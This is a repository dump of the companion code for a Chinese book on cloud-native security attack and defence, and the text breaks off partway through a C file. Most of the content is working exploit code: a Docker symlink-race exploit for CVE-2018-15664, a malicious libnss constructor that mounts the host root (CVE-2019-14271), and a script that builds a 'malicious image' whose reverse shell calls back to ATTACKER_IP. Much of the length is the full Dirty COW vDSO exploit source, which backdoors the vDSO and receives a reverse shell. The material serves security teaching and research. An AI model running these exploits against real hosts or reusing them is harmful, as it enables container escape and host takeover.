Repository: brant-ruan/cloud-native-security-book Branch: main Commit: 473a5642e953 Files: 49 Total size: 125.3 KB Directory structure: gitextract_faxozo3s/ ├── README.md └── code/ ├── 0302-开发侧攻击/ │ ├── 02-CVE-2018-15664/ │ │ └── symlink_race/ │ │ ├── build/ │ │ │ ├── Dockerfile │ │ │ └── symlink_swap.c │ │ ├── run_read.sh │ │ └── run_write.sh │ └── 03-CVE-2019-14271/ │ ├── breakout │ └── file-service.c ├── 0303-供应链攻击/ │ ├── 01-CVE-2019-5021-alpine/ │ │ └── Dockerfile │ └── 02-CVE-2016-5195-malicious-image/ │ └── build.sh ├── 0304-运行时攻击/ │ ├── 01-容器逃逸/ │ │ ├── CVE-2016-5195/ │ │ │ ├── 0xdeadbeef.c │ │ │ ├── Makefile │ │ │ └── payload.s │ │ ├── CVE-2019-5736/ │ │ │ └── main.go │ │ ├── cause-core-dump.c │ │ └── tmp-dot-x.py │ ├── 02-安全容器逃逸/ │ │ ├── build.sh │ │ ├── change_container_runtime.sh │ │ ├── clean_kata.sh │ │ ├── docker/ │ │ │ ├── Dockerfile │ │ │ ├── attack.sh │ │ │ ├── bash │ │ │ └── evil_bin │ │ ├── evil_agent_src/ │ │ │ ├── grpc.go │ │ │ └── mount.go │ │ ├── evil_bin.c │ │ ├── exploit.sh │ │ ├── get_kata_src.sh │ │ └── install_kata.sh │ └── 03-资源耗尽型攻击/ │ ├── exhaust_cpu.sh │ ├── exhaust_disk.sh │ ├── exhaust_mem.sh │ └── exhaust_pid.sh ├── 0402-Kubernetes组件不安全配置/ │ └── deploy_escape_pod_on_remote_host.sh ├── 0403-CVE-2018-1002105/ │ ├── attacker.yaml │ ├── cve_2018_1002105_namespace.yaml │ ├── cve_2018_1002105_pod.yaml │ ├── cve_2018_1002105_role.yaml │ ├── cve_2018_1002105_role_binding.yaml │ ├── exploit.py │ └── test-token.csv ├── 0404-K8s拒绝服务攻击/ │ ├── CVE-2019-11253-poc.sh │ └── CVE-2019-9512-poc.py └── 0405-云原生网络攻击/ ├── Dockerfile ├── attacker.yaml ├── build_image.sh ├── cleanup.sh ├── exploit.sh ├── k8s_dns_mitm.py └── victim.yaml ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ # 《云原生安全:攻防实践与体系构建》资料仓库

本仓库提供了《云原生安全:攻防实践与体系构建》一书的补充材料和随书源码,供感兴趣的读者深入阅读、实践。 **本仓库所有内容仅供教学、研究使用,严禁用于非法用途,违者后果自负!** 相关链接:[豆瓣](https://book.douban.com/subject/35640762/) | [京东](https://item.jd.com/13495676.html) | [当当](http://product.dangdang.com/29318802.html) ## 补充阅读资料 - [100_云计算简介.pdf](appendix/100_云计算简介.pdf) - [101_代码安全.pdf](appendix/101_代码安全.pdf) - [200_容器技术.pdf](appendix/200_容器技术.pdf) - [201_容器编排.pdf](appendix/201_容器编排.pdf) - [202_微服务.pdf](appendix/202_微服务.pdf) - [203_服务网格.pdf](appendix/203_服务网格.pdf) - [204_DevOps.pdf](appendix/204_DevOps.pdf) - [CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf](appendix/CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf) - [CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf](appendix/CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf) - [CVE-2020-8595:Istio认证绕过.pdf](appendix/CVE-2020-8595:Istio认证绕过.pdf) - [靶机实验:综合场景下的渗透实战.pdf](appendix/靶机实验:综合场景下的渗透实战.pdf) ## 随书源码 |代码目录|描述|定位| |:-|:-|:-| |[0302-开发侧攻击/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race)| CVE-2018-15664漏洞利用代码|3.2.2小节| |[0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/03-CVE-2019-14271)|CVE-2019-14271漏洞利用代码|3.2.3小节| |[0303-供应链攻击/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/01-CVE-2019-5021-alpine)|基于存在CVE-2019-5021漏洞的Alpine镜像构建漏洞镜像示例|3.3.1小节| |[0303-供应链攻击/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/02-CVE-2016-5195-malicious-image)|CVE-2016-5195漏洞利用镜像构建示例|3.3.2小节| |[0304-运行时攻击/01-容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸)|多个用于容器逃逸的代码片段|3.4.1小节| |[0304-运行时攻击/02-安全容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/02-安全容器逃逸)|安全容器逃逸的漏洞利用代码|3.4.2小节| |[0304-运行时攻击/03-资源耗尽型攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/03-资源耗尽型攻击)|资源耗尽型攻击示例代码|3.4.3小节| |[0402-Kubernetes组件不安全配置/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes组件不安全配置/)|K8s不安全配置的利用命令|4.2节| |[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|CVE-2018-1002105漏洞利用代码|4.3节| |[0404-K8s拒绝服务攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s拒绝服务攻击/)|CVE-2019-11253和CVE-2019-9512的漏洞利用代码|4.4节| |[0405-云原生网络攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-云原生网络攻击/)|云原生中间人攻击网络环境模拟及攻击代码示例|4.5节| ## 分享与交流 欢迎关注“绿盟科技研究通讯”公众号,我们将持续、高质量地输出信息安全前沿领域研究成果: ![微信搜索“绿盟科技研究通讯”](images/yjtx.png) ## 注意事项 其中部分源码来自网络上其他地方,为方便读者实践,一并归档。这些源码及“摘录出处”为: 1. [0302-开发侧攻击/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race):https://seclists.org/oss-sec/2019/q2/131 2. [0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击):https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/ 3. [0304-运行时攻击/01-容器逃逸/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195):https://github.com/scumjr/dirtycow-vdso 4. [0304-运行时攻击/01-容器逃逸/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736):https://github.com/Frichetten/CVE-2019-5736-PoC 引用的项目及代码的许可证(License)以原项目为准。 部分经过笔者修改的源码不再在此列出,书中对相关引用均给出了出处,感兴趣的读者可以参考。 ## 勘误及补充说明 ### 第1版第3次印刷 #### P56 - 3.4.1 容器逃逸 详见[issue 9](https://github.com/Metarget/cloud-native-security-book/issues/9)。 未来印刷将对原文作以下两处补充和修正: 1. 增加对`#!/proc/self/exe`的必要性的解释(non-dumpable -> dumpable),这里或可提到CVE-2016-9962漏洞。 2. 在攻击步骤中明确给出上下文,消除“一次runC执行中实现覆盖和shellcode执行”的歧义。 感谢读者[@XDTG](https://github.com/XDTG)指出。我们将在后续的印刷中进行补充和修正。 #### P44 - 3.3.1 镜像漏洞利用 详见[issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8)。 第44页下方用于构建镜像的命令不完整,缺少对构建目录的指定。正确的命令如下(注意最后增加了一个`.`): ```bash docker build --network=host -t alpine:cve-2019-5021 . ``` 感谢读者[@WAY29](https://github.com/WAY29)指出。我们将在后续的印刷中进行修正。 #### P42 - 3.2.3 CVE-2019-14271:加载不受信任的动态链接库 详见[issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7)。 感谢读者[@WAY29](https://github.com/WAY29)指出。为了成功编译Glibc,需要事先进行configure操作,才能进行make。我们将在后续的印刷中进行修正。 #### P42 - 3.2.3 CVE-2019-14271:加载不受信任的动态链接库 详见[issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6)。 感谢读者[@XDTG](https://github.com/XDTG)指出。书上的步骤在效果上没有问题,但[@XDTG](https://github.com/XDTG)提出的方案更自然优雅。经验证后,我们考虑在后续的印刷中更新方案。 ### 第1版第1次印刷 #### P37 - 3.2.2 CVE-2018-15664:符号链接替换漏洞(这里为补充说明,原文并无错误) 正文第八行开始的段落描述较难理解: > symlink_swap.c的任务是在容器内创建指向根目录“/”的符号链接,并不断地交换符号链接(由命令行参数传入,如“/totally_safe_path”)与一个正常目录(例如“/totally_safe_path-stashed”)的名字。这样一来,在宿主机上执行 docker cp时,如果首先检查到“/totally_safe_path”是一个正常目录,但在后面执行复制操作时“/totally_safe_path”却变成了一个符号链接,那么Docker将在宿主机上解析这个符号链接。 事实上,在容器内部,一旦开始通过renameat2进行名称交换,`/totally_safe_path`和`/totally_safe_path-stashed`实际上对于我们来说只是两个字符串了,不再与符号链接或正常目录绑定,只有停止交换的那一刻,才会重新确定哪个字符串指向哪个(符号链接或目录)。 因此,书中“这样一来,在宿主机上执行docker cp时,如果首先...”这里,这时,容器内已经开始进行名称交换了。用户(或攻击者)想要去docker cp的是容器内名为`/totally_safe_path`的文件或目录(“十分安全的路径”的意思),这是预期(或者说是这个场景的设定);docker cp在执行过程中,在检查阶段,`/totally_safe_path`路径字符串还指向一个正常目录,但是到了复制操作时,`/totally_safe_path`却已经被交换指向了一个符号链接。 感谢读者@泡泡球麻麻君指出。 #### P85 - 4.2.1 Kubernetes API Server未授权访问(第1版第3次印刷已修复) 正文倒数第四行部分存在歧义: > 那么攻击者只要网络可达,都能够通过此端口操控集群。 事实上,如果仅仅设置`--insecure-port=8080`,那么服务也只是监听在`localhost`,远程攻击者通常情况下是无法访问的,即使从IP角度来讲是“网络可达的”。如果想要远程操控,还需要配置`--insecure-bind-address=0.0.0.0`才行。 这里的“网络可达”实际上想说明两种情况: 1. 加`--insecure-bind-address`的情况下直接被外部访问,即上面这种; 2. 能够以某种方式访问到localhost,这个场景又包括: 1. 本地用户利用8080端口的服务来提升权限; 2. 基于类似SSRF、DNS rebinding的方式来实现远程访问localhost端口。 ================================================ FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/Dockerfile ================================================ # Copyright (C) 2018 Aleksa Sarai # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # Build the binary. FROM opensuse/leap RUN zypper in -y gcc glibc-devel-static RUN mkdir /builddir COPY symlink_swap.c /builddir/symlink_swap.c RUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c # Set up our malicious rootfs. FROM opensuse/leap ARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag ARG SYMSWAP_PATH=/totally_safe_path RUN echo "FAILED -- INSIDE CONTAINER PATH" >"$SYMSWAP_TARGET" COPY --from=0 /builddir/symlink_swap /symlink_swap ENTRYPOINT ["/symlink_swap"] ================================================ FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/symlink_swap.c ================================================ /* * Copyright (C) 2018 Aleksa Sarai * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . */ #define _GNU_SOURCE #include #include #include #include #include #include #include #define usage() \ do { printf("usage: symlink_swap \n"); exit(1); } while(0) #define bail(msg) \ do { perror("symlink_swap: " msg); exit(1); } while (0) /* No glibc wrapper for this, so wrap it ourselves. */ #define RENAME_EXCHANGE (1 << 1) /*int renameat2(int olddirfd, const char *oldpath, int newdirfd, const char *newpath, int flags) { return syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags); }*/ /* usage: symlink_swap */ int main(int argc, char **argv) { if (argc != 2) usage(); char *symlink_path = argv[1]; char *stash_path = NULL; if (asprintf(&stash_path, "%s-stashed", symlink_path) < 0) bail("create stash_path"); /* Create a dummy file at symlink_path. */ struct stat sb = {0}; if (!lstat(symlink_path, &sb)) { int err; if (sb.st_mode & S_IFDIR) err = rmdir(symlink_path); else err = unlink(symlink_path); if (err < 0) bail("unlink symlink_path"); } /* * Now create a symlink to "/" (which will resolve to the host's root if we * win the race) and a dummy directory at stash_path for us to swap with. * We use a directory to remove the possibility of ENOTDIR which reduces * the chance of us winning. */ if (symlink("/", symlink_path) < 0) bail("create symlink_path"); if (mkdir(stash_path, 0755) < 0) bail("mkdir stash_path"); /* Now we do a RENAME_EXCHANGE forever. */ for (;;) { int err = renameat2(AT_FDCWD, symlink_path, AT_FDCWD, stash_path, RENAME_EXCHANGE); if (err < 0) perror("symlink_swap: rename exchange failed"); } return 0; } ================================================ FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_read.sh ================================================ #!/bin/zsh # Copyright (C) 2018 Aleksa Sarai # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . SYMSWAP_PATH=/totally_safe_path SYMSWAP_TARGET=/w00t_w00t_im_a_flag # Create our flag. echo "SUCCESS -- COPIED FROM THE HOST" | sudo tee "$SYMSWAP_TARGET" sudo chmod 000 "$SYMSWAP_TARGET" # Run and build the malicious image. docker build -t cyphar/symlink_swap \ --build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \ --build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/ ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH") # Now continually try to copy the files. idx=0 while true do mkdir "ex${idx}" docker cp "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET" "ex${idx}/out" idx=$(($idx + 1)) done ================================================ FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_write.sh ================================================ #!/bin/zsh # Copyright (C) 2018 Aleksa Sarai # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . SYMSWAP_PATH=/totally_safe_path SYMSWAP_TARGET=/w00t_w00t_im_a_flag # Create our flag. echo "FAILED -- HOST FILE UNCHANGED" | sudo tee "$SYMSWAP_TARGET" sudo chmod 0444 "$SYMSWAP_TARGET" # Run and build the malicious image. docker build -t cyphar/symlink_swap \ --build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \ --build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/ ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH") echo "SUCCESS -- HOST FILE CHANGED" | tee localpath # Now continually try to copy the files. while true do docker cp localpath "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET" done ================================================ FILE: code/0302-开发侧攻击/03-CVE-2019-14271/breakout ================================================ #!/bin/bash umount /host_fs && rm -rf /host_fs mkdir /host_fs mount -t proc none /proc # mount the host's procfs over /proc cd /proc/1/root # chdir to host's root mount --bind . /host_fs # mount host root at /host_fs ================================================ FILE: code/0302-开发侧攻击/03-CVE-2019-14271/file-service.c ================================================ // content should be added into nss/nss_files/files-service.c #include #include #include #include #define ORIGINAL_LIBNSS "/original_libnss_files.so.2" #define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2" bool is_priviliged(); __attribute__ ((constructor)) void run_at_link(void) { char * argv_break[2]; if (!is_priviliged()) return; rename(ORIGINAL_LIBNSS, LIBNSS_PATH); if (!fork()) { // Child runs breakout argv_break[0] = strdup("/breakout"); argv_break[1] = NULL; execve("/breakout", argv_break, NULL); } else wait(NULL); // Wait for child return; } bool is_priviliged() { FILE * proc_file = fopen("/proc/self/exe", "r"); if (proc_file != NULL) { fclose(proc_file); return false; // can open so /proc exists, not privileged } return true; // we're running in the context of docker-tar } ================================================ FILE: code/0303-供应链攻击/01-CVE-2019-5021-alpine/Dockerfile ================================================ FROM alpine:3.5 RUN apk add --no-cache shadow RUN adduser -S non_root USER non_root ================================================ FILE: code/0303-供应链攻击/02-CVE-2016-5195-malicious-image/build.sh ================================================ #!/bin/bash # modify ATTACKER_IP and ATTACKER_PORT before building ATTACKER_IP=REVERSE_SHELL_IP ATTACKER_PORT=REVERSE_SHELL_PORT TEMP_DIR=./temp-dirtycow set -e -x # build ExP sudo apt update && sudo apt install -y build-essential nasm mkdir -p $TEMP_DIR git clone https://github.com/scumjr/dirtycow-vdso.git $TEMP_DIR cd $TEMP_DIR make cd .. # build malicious image cat << EOF > ./Dockerfile FROM ubuntu:18.04 ADD $TEMP_DIR/0xdeadbeef /entrypoint RUN chmod u+x /entrypoint ENTRYPOINT ["/entrypoint", "$ATTACKER_IP:$ATTACKER_PORT"] EOF sudo docker build -t cve-2016-5195:v1.0 . rm ./Dockerfile rm -rf $TEMP_DIR ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/0xdeadbeef.c ================================================ /* * CVE-2016-5195 POC * -scumjr */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "payload.h" #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif #define PATTERN_IP "\xde\xc0\xad\xde" #define PATTERN_PORT "\x37\x13" #define PATTERN_PROLOGUE "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" #define PAYLOAD_IP INADDR_LOOPBACK #define PAYLOAD_PORT 1234 #define LOOP 0x10000 #define VDSO_SIZE (2 * PAGE_SIZE) #define ARRAY_SIZE(arr) (sizeof(arr) / sizeof(arr[0])) typedef unsigned int uint32_t; typedef unsigned long uint64_t; struct vdso_patch { unsigned char *patch; unsigned char *copy; size_t size; void *addr; }; struct payload_patch { const char *name; void *pattern; size_t pattern_size; void *buf; size_t size; }; struct prologue { char *opcodes; size_t size; }; struct mem_arg { void *vdso_addr; bool do_patch; bool stop; unsigned int patch_number; }; static char child_stack[8192]; static struct vdso_patch vdso_patch[2]; static struct prologue prologues[] = { /* push rbp; mov rbp, rsp; lfence */ { "\x55\x48\x89\xe5\x0f\xae\xe8", 7 }, /* push rbp; mov rbp, rsp; push r14 */ { "\x55\x48\x89\xe5\x41\x57", 6 }, /* push rbp; mov rbp, rdi; push rbx */ { "\x55\x48\x89\xfd\x53", 5 }, /* push rbp; mov rbp, rsp; xchg rax, rax */ { "\x55\x48\x89\xe5\x66\x66\x90", 7 }, /* push rbp; cmp edi, 1; mov rbp, rsp */ { "\x55\x83\xff\x01\x48\x89\xe5", 7 }, }; static int writeall(int fd, const void *buf, size_t count) { const char *p; ssize_t i; p = buf; do { i = write(fd, p, count); if (i == 0) { return -1; } else if (i == -1) { if (errno == EINTR) continue; return -1; } count -= i; p += i; } while (count > 0); return 0; } static void *get_vdso_addr(void) { return (void *)getauxval(AT_SYSINFO_EHDR); } static int ptrace_memcpy(pid_t pid, void *dest, const void *src, size_t n) { const unsigned char *s; unsigned long value; unsigned char *d; d = dest; s = src; while (n >= sizeof(long)) { memcpy(&value, s, sizeof(value)); if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) { warn("ptrace(PTRACE_POKETEXT)"); return -1; } n -= sizeof(long); d += sizeof(long); s += sizeof(long); } if (n > 0) { d -= sizeof(long) - n; errno = 0; value = ptrace(PTRACE_PEEKTEXT, pid, d, NULL); if (value == -1 && errno != 0) { warn("ptrace(PTRACE_PEEKTEXT)"); return -1; } memcpy((unsigned char *)&value + sizeof(value) - n, s, n); if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) { warn("ptrace(PTRACE_POKETEXT)"); return -1; } } return 0; } static int patch_payload_helper(struct payload_patch *pp) { unsigned char *p; p = memmem(payload, payload_len, pp->pattern, pp->pattern_size); if (p == NULL) { fprintf(stderr, "[-] failed to patch payload's %s\n", pp->name); return -1; } memcpy(p, pp->buf, pp->size); p = memmem(payload, payload_len, pp->pattern, pp->pattern_size); if (p != NULL) { fprintf(stderr, "[-] payload's %s pattern was found several times\n", pp->name); return -1; } return 0; } /* * A few bytes of the payload must be patched: prologue, ip, and port. */ static int patch_payload(struct prologue *p, uint32_t ip, uint16_t port) { int i; struct payload_patch payload_patch[] = { { "port", PATTERN_PORT, sizeof(PATTERN_PORT)-1, &port, sizeof(port) }, { "ip", PATTERN_IP, sizeof(PATTERN_IP)-1, &ip, sizeof(ip) }, { "prologue", PATTERN_PROLOGUE, sizeof(PATTERN_PROLOGUE)-1, p->opcodes, p->size }, }; for (i = 0; i < ARRAY_SIZE(payload_patch); i++) { if (patch_payload_helper(&payload_patch[i]) == -1) return -1; } return 0; } /* make a copy of vDSO to restore it later */ static int save_orig_vdso(void) { struct vdso_patch *p; int i; for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) { p = &vdso_patch[i]; p->copy = malloc(p->size); if (p->copy == NULL) { warn("malloc"); return -1; } memcpy(p->copy, p->addr, p->size); } return 0; } static int build_vdso_patch(void *vdso_addr, struct prologue *prologue) { uint32_t clock_gettime_offset, target; unsigned long clock_gettime_addr; unsigned char *p, *buf; uint64_t entry_point; int i; /* e_entry */ p = vdso_addr; entry_point = *(uint64_t *)(p + 0x18); clock_gettime_offset = (uint32_t)entry_point & 0xfff; clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset; /* patch #1: put payload at the end of vdso */ vdso_patch[0].patch = payload; vdso_patch[0].size = payload_len; vdso_patch[0].addr = (unsigned char *)vdso_addr + VDSO_SIZE - payload_len; p = vdso_patch[0].addr; for (i = 0; i < payload_len; i++) { if (p[i] != '\x00') { fprintf(stderr, "failed to find a place for the payload\n"); return -1; } } /* patch #2: hijack clock_gettime prologue */ buf = malloc(sizeof(PATTERN_PROLOGUE)-1); if (buf == NULL) { warn("malloc"); return -1; } /* craft call to payload */ target = VDSO_SIZE - payload_len - clock_gettime_offset; memset(buf, '\x90', sizeof(PATTERN_PROLOGUE)-1); buf[0] = '\xe8'; *(uint32_t *)&buf[1] = target - 5; vdso_patch[1].patch = buf; vdso_patch[1].size = prologue->size; vdso_patch[1].addr = (unsigned char *)clock_gettime_addr; save_orig_vdso(); return 0; } static int backdoor_vdso(pid_t pid, unsigned int patch_number) { struct vdso_patch *p; p = &vdso_patch[patch_number]; return ptrace_memcpy(pid, p->addr, p->patch, p->size); } static int restore_vdso(pid_t pid, unsigned int patch_number) { struct vdso_patch *p; p = &vdso_patch[patch_number]; return ptrace_memcpy(pid, p->addr, p->copy, p->size); } /* * Check if vDSO is entirely patched. This function is executed in a different * memory space thanks to fork(). Return 0 on success, 1 otherwise. */ static void check(struct mem_arg *arg) { struct vdso_patch *p; void *src; int i, ret; p = &vdso_patch[arg->patch_number]; src = arg->do_patch ? p->patch : p->copy; ret = 1; for (i = 0; i < LOOP; i++) { if (memcmp(p->addr, src, p->size) == 0) { ret = 0; break; } usleep(100); } exit(ret); } static void *madviseThread(void *arg_) { struct mem_arg *arg; arg = (struct mem_arg *)arg_; while (!arg->stop) { if (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) { warn("madvise"); break; } } return NULL; } static int debuggee(void *arg_) { if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) == -1) err(1, "prctl(PR_SET_PDEATHSIG)"); if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) err(1, "ptrace(PTRACE_TRACEME)"); kill(getpid(), SIGSTOP); return 0; } /* use ptrace to write to read-only mappings */ static void *ptrace_thread(void *arg_) { int flags, ret2, status; struct mem_arg *arg; pid_t pid; void *ret; arg = (struct mem_arg *)arg_; flags = CLONE_VM|CLONE_PTRACE; pid = clone(debuggee, child_stack + sizeof(child_stack) - 8, flags, arg); if (pid == -1) { warn("clone"); return NULL; } if (waitpid(pid, &status, __WALL) == -1) { warn("waitpid"); return NULL; } ret = NULL; while (!arg->stop) { if (arg->do_patch) ret2 = backdoor_vdso(pid, arg->patch_number); else ret2 = restore_vdso(pid, arg->patch_number); if (ret2 == -1) { ret = NULL; break; } } if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) warn("ptrace(PTRACE_CONT)"); if (waitpid(pid, NULL, __WALL) == -1) warn("waitpid"); return ret; } static int exploit_helper(struct mem_arg *arg) { pthread_t pth1, pth2; int ret, status; pid_t pid; fprintf(stderr, "[*] %s: patch %d/%ld\n", arg->do_patch ? "exploit" : "restore", arg->patch_number + 1, ARRAY_SIZE(vdso_patch)); /* run "check" in a different memory space */ pid = fork(); if (pid == -1) { warn("fork"); return -1; } else if (pid == 0) { check(arg); } arg->stop = false; pthread_create(&pth1, NULL, madviseThread, arg); pthread_create(&pth2, NULL, ptrace_thread, arg); /* wait for "check" process */ if (waitpid(pid, &status, 0) == -1) { warn("waitpid"); return -1; } /* tell the 2 threads to stop and wait for them */ arg->stop = true; pthread_join(pth1, NULL); pthread_join(pth2, NULL); /* check result */ ret = WIFEXITED(status) ? WEXITSTATUS(status) : -1; if (ret == 0) { fprintf(stderr, "[*] vdso successfully %s\n", arg->do_patch ? "backdoored" : "restored"); } else { fprintf(stderr, "[-] failed to win race condition...\n"); } return ret; } /* * Apply vDSO patches in the correct order. * * During the backdoor step, the payload must be written before hijacking the * function prologue. During the restore step, the prologue must be restored * before removing the payload. */ static int exploit(struct mem_arg *arg, bool do_patch) { unsigned int i; int ret; ret = 0; arg->do_patch = do_patch; for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) { if (do_patch) arg->patch_number = i; else arg->patch_number = ARRAY_SIZE(vdso_patch) - i - 1; if (exploit_helper(arg) != 0) { ret = -1; break; } } return ret; } static int create_socket(uint16_t port) { struct sockaddr_in addr; int enable, s; s = socket(AF_INET, SOCK_STREAM, 0); if (s == -1) { warn("socket"); return -1; } enable = 1; if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable)) == -1) warn("setsockopt(SO_REUSEADDR)"); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = port; if (bind(s, (struct sockaddr *) &addr, sizeof(addr)) == -1) { warn("failed to bind socket on port %d", ntohs(port)); close(s); return -1; } if (listen(s, 1) == -1) { warn("listen"); close(s); return -1; } return s; } /* interact with reverse connect shell */ static int yeah(struct mem_arg *arg, int s) { struct sockaddr_in addr; struct pollfd fds[2]; socklen_t addr_len; char buf[4096]; nfds_t nfds; int c, n; fprintf(stderr, "[*] waiting for reverse connect shell...\n"); addr_len = sizeof(addr); while (1) { c = accept(s, (struct sockaddr *)&addr, &addr_len); if (c == -1) { if (errno == EINTR) continue; warn("accept"); return -1; } break; } close(s); fprintf(stderr, "[*] enjoy!\n"); if (fork() == 0) { if (exploit(arg, false) == -1) fprintf(stderr, "[-] failed to restore vDSO\n"); exit(0); } fds[0].fd = STDIN_FILENO; fds[0].events = POLLIN; fds[1].fd = c; fds[1].events = POLLIN; nfds = 2; while (nfds > 0) { if (poll(fds, nfds, -1) == -1) { if (errno == EINTR) continue; warn("poll"); break; } if (fds[0].revents == POLLIN) { n = read(STDIN_FILENO, buf, sizeof(buf)); if (n == -1) { if (errno != EINTR) { warn("read(STDIN_FILENO)"); break; } } else if (n == 0) { break; } else { writeall(c, buf, n); } } if (fds[1].revents == POLLIN) { n = read(c, buf, sizeof(buf)); if (n == -1) { if (errno != EINTR) { warn("read(c)"); break; } } else if (n == 0) { break; } else { writeall(STDOUT_FILENO, buf, n); } } } return 0; } static struct prologue *fingerprint_prologue(void *vdso_addr) { unsigned long clock_gettime_addr; uint32_t clock_gettime_offset; uint64_t entry_point; struct prologue *p; int i; /* e_entry */ entry_point = *(uint64_t *)((unsigned char *)vdso_addr + 0x18); clock_gettime_offset = (uint32_t)entry_point & 0xfff; clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset; for (i = 0; i < ARRAY_SIZE(prologues); i++) { p = &prologues[i]; if (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0) return p; } return NULL; } /* * 1.2.3.4:1337 */ static int parse_ip_port(char *str, uint32_t *ip, uint16_t *port) { char *p; int ret; str = strdup(str); if (str == NULL) { warn("strdup"); return -1; } p = strchr(str, ':'); if (p != NULL && p[1] != '\x00') { *p = '\x00'; *port = htons(atoi(p + 1)); } ret = (inet_aton(str, (struct in_addr *)ip) == 1) ? 0 : -1; if (ret == -1) warn("inet_aton(%s)", str); free(str); return ret; } int main(int argc, char *argv[]) { struct prologue *prologue; struct mem_arg arg; 